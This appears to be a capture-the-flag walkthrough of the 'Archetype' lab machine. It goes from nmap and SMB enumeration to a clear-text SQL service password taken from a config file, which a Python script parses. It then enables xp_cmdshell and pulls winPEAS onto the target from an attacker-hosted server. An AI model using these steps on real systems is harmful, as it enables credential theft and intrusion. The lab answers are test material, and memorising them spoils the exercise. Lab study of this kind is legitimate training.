Archetype

Task #1: Which TCP port is hosting a database server?

  • A: 1433

  • nmap -sC -sV 10.129.186.221

    Nmap scan report for 10.129.186.221
    Host is up (0.035s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE      VERSION
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
    1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
    | ms-sql-ntlm-info:
    |   Target_Name: ARCHETYPE
    |   NetBIOS_Domain_Name: ARCHETYPE
    |   NetBIOS_Computer_Name: ARCHETYPE
    |   DNS_Domain_Name: Archetype
    |   DNS_Computer_Name: Archetype
    |_  Product_Version: 10.0.17763
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Not valid before: 2022-12-21T21:43:52
    |_Not valid after:  2052-12-21T21:43:52
    |_ssl-date: 2022-12-21T21:44:51+00:00; 0s from scanner time.
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
    | ms-sql-info:
    |   10.129.186.221:1433:
    |     Version:
    |       name: Microsoft SQL Server 2017 RTM
    |       number: 14.00.1000.00
    |       Product: Microsoft SQL Server 2017
    |       Service pack level: RTM
    |       Post-SP patches applied: false
    |_    TCP port: 1433
    | smb-os-discovery:
    |   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
    |   Computer name: Archetype
    |   NetBIOS computer name: ARCHETYPE\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2022-12-21T13:44:44-08:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2022-12-21T21:44:42
    |_  start_date: N/A
    

Task #2: What is the name of the non-Administrative share available over SMB?

  • A: backups

  • nmap -p 445 --script smb-enum-shares.nse 10.129.186.221

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares:
    |   account_used: guest
    |   \\10.129.186.221\ADMIN$:
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Remote Admin
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.129.186.221\C$:
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Default share
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.129.186.221\IPC$:
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: Remote IPC
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\10.129.186.221\backups:
    |     Type: STYPE_DISKTREE
    |     Comment:
    |     Anonymous access: READ
    |_    Current user access: READ
    

Task #3: What is the password identified in the file on the SMB share?

  • A: M3g4c0rp123

  • smbclient //10.129.186.221/backups -U guest to connect to the share (the share enumeration above showed anonymous READ, so just press Enter at the password prompt, or add -N to skip it)

    smb: \> ls
      .                                   D        0  Mon Jan 20 07:20:57 2020
      ..                                  D        0  Mon Jan 20 07:20:57 2020
      prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020
    
      5056511 blocks of size 4096. 2609339 blocks available
    smb: \> get prod.dtsConfig
    getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
    smb: \> exit
    
  • cat prod.dtsConfig to view the file; it is an SSIS package configuration, and the connection string inside it carries a Windows account (ARCHETYPE\sql_svc) together with its clear-text password

    <DTSConfiguration>
      <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
      </DTSConfigurationHeading>
      <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
      </Configuration>
    </DTSConfiguration>
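
Connection strings in .dtsConfig files follow the same Key=Value; layout as any OLE DB connection string, so the credential can be pulled out programmatically rather than by eye. The script below is an added example, not part of the original write-up: it parses a DTSConfiguration document, finds every ConfiguredValue that holds a password, and reports the account, the data source and whether the account is a Windows principal (DOMAIN\user), which decides whether mssqlclient.py needs -windows-auth. The embedded sample is a copy of the prod.dtsConfig shown above so the script runs offline; the function names are this example's own, and it assumes the file is plain UTF-8/UTF-16 XML as SSIS writes it.

```python
"""Extract credentials from SSIS package configuration files (*.dtsConfig).

Added example for this write-up; helper names are the example's own.
"""
import sys
import xml.etree.ElementTree as ET

# Inline copy (constructed for the example) of the prod.dtsConfig pulled from
# \\10.129.186.221\backups, so the script can be run without the share.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys (OLE DB / SQL Native Client spellings) for the secret
# and the account; the provider treats keys case-insensitively.
SECRET_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid")


def parse_connection_string(value: str) -> dict:
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased key."""
    pairs = {}
    for item in value.split(";"):
        if "=" not in item:
            continue  # trailing ';' or stray text
        key, _, val = item.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def extract_credentials(xml_doc) -> list:
    """Return one record per <Configuration> whose value embeds a password."""
    root = ET.fromstring(xml_doc)  # accepts str or bytes (bytes honour the XML encoding decl)
    findings = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        secret = next((pairs[k] for k in SECRET_KEYS if k in pairs), None)
        if secret is None:
            continue  # a property that is not a connection string with a password
        user = next((pairs[k] for k in USER_KEYS if k in pairs), None)
        findings.append({
            "path": conf.get("Path", ""),
            "data_source": pairs.get("data source", pairs.get("server", "")),
            "user": user,
            "password": secret,
            "catalog": pairs.get("initial catalog", pairs.get("database", "")),
            # DOMAIN\user means a Windows account: mssqlclient.py needs -windows-auth
            "windows_auth": bool(user) and "\\" in user,
            # Persist Security Info=True keeps the password readable from the open connection object
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return findings


def main(argv):
    # With a path argument, scan that file; otherwise use the embedded sample.
    doc = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_DTSCONFIG
    for f in extract_credentials(doc):
        auth = "-windows-auth" if f["windows_auth"] else "(SQL login)"
        print(f"{f['path']}")
        print(f"  {f['user']}:{f['password']} @ {f['data_source'] or '.'}/{f['catalog']} {auth}")
        if f["persist_security_info"]:
            print("  note: Persist Security Info=True")


if __name__ == "__main__":
    main(sys.argv)
```

Run it with the path of any .dtsConfig recovered from a share (python3 dtsconfig_creds.py prod.dtsConfig); with no argument it processes the embedded sample. A Data Source of "." means the local instance, which is why the credential is usable against the SQL Server on the same host that exposes the share.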
    

Task #4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

  • A: mssqlclient.py
  • wget https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz to download the impacket library
  • tar -xvf impacket-0.10.0.tar.gz to extract the impacket library, then rm impacket-0.10.0.tar.gz to remove the archive
  • cd impacket-0.10.0, then python3 -m pip install . to install the library and the example scripts
  • python3 examples/mssqlclient.py ARCHETYPE/sql_svc@10.129.186.221 -windows-auth, then enter the password from above when prompted (-windows-auth is needed because ARCHETYPE\sql_svc is a Windows account, not a SQL Server login)

Task #5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

  • A: xp_cmdshell
  • xp_cmdshell is disabled by default, so it has to be enabled before it can spawn a shell; changing it with sp_configure requires the ALTER SETTINGS permission (held by the sysadmin and serveradmin roles), which the steps below only succeed with because sql_svc holds it
  • EXEC sp_configure 'show advanced options', 1; RECONFIGURE; to enable advanced options (xp_cmdshell is an advanced option and cannot be set until this is on)
  • EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; to enable xp_cmdshell
  • xp_cmdshell dir c:\ to list the contents of the C drive (mssqlclient.py's shortcut for EXEC xp_cmdshell 'dir c:\'; for a sysadmin caller the command runs under the SQL Server service account, so the shell inherits that account's privileges)

Task #6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

  • A: winPEAS
  • The target is a Windows host, so the Windows build from the PEASS-ng release is the one to use (linpeas.sh is the Linux counterpart and will not run here): wget https://github.com/carlospolop/PEASS-ng/releases/download/20221218/winPEASx64.exe to download the binary
  • Transfer winPEASx64.exe to the target (for example, serve it with python3 -m http.server on the attacking host and fetch it from the xp_cmdshell shell with PowerShell's Invoke-WebRequest), then run winPEASx64.exe from that shell

Task #7: What file contains the administrator's password?

  • A: ``

Task #8: Submit user flag

  • A: ``

Task #9: Submit root flag

  • A: ``

Tags

  1. impacket
  2. smb